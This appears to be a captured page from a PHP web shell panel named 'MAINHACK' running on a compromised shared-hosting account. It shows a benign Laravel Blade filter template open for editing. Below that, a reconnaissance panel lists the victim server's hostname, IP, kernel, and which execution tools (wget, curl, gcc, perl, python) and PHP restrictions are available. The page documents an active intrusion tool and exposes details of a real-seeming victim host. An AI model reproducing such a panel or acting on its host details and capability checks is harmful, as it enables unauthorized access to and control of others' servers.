[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 851f18816ca67ea7d6bb8462910f372bfb12f2f4.php
<?php $days = ['saturday', 'sunday','monday','tuesday','wednesday','thursday','friday']; $requestDays = request()->get('day'); if (!is_array($requestDays)) { $requestDays = [$requestDays]; } ?> <div class="mt-20 p-20 rounded-sm shadow-lg border border-gray300 filters-container"> <h3 class="category-filter-title font-20 font-weight-bold text-dark-blue"><?php echo e(trans('public.time')); ?></h3> <div class="mt-35"> <?php $__currentLoopData = $days; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $day): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="custom-control custom-checkbox mb-20 full-checkbox w-100"> <input type="checkbox" name="day[]" value="<?php echo e($day); ?>" class="custom-control-input" id="day_<?php echo e($day); ?>" <?php echo e((in_array($day, $requestDays)) ? 'checked' : ''); ?>> <label class="custom-control-label font-14 w-100" for="day_<?php echo e($day); ?>"><?php echo e(trans('panel.'.$day)); ?></label> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <div class="form-group"> <label class="form-label"><?php echo e(trans('update.time_range')); ?></label> <div class="range wrunner-value-bottom" id="timeRangeInstructorPage" data-minLimit="0" data-maxLimit="23" > <input type="hidden" name="min_time" value="<?php echo e(request()->get('min_time') ?? null); ?>"> <input type="hidden" name="max_time" value="<?php echo e(request()->get('max_time') ?? null); ?>"> </div> </div> </div> <?php /**PATH /home/aoneqssk/public_html/resources/views/web/default/instructorFinder/components/time_filter.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285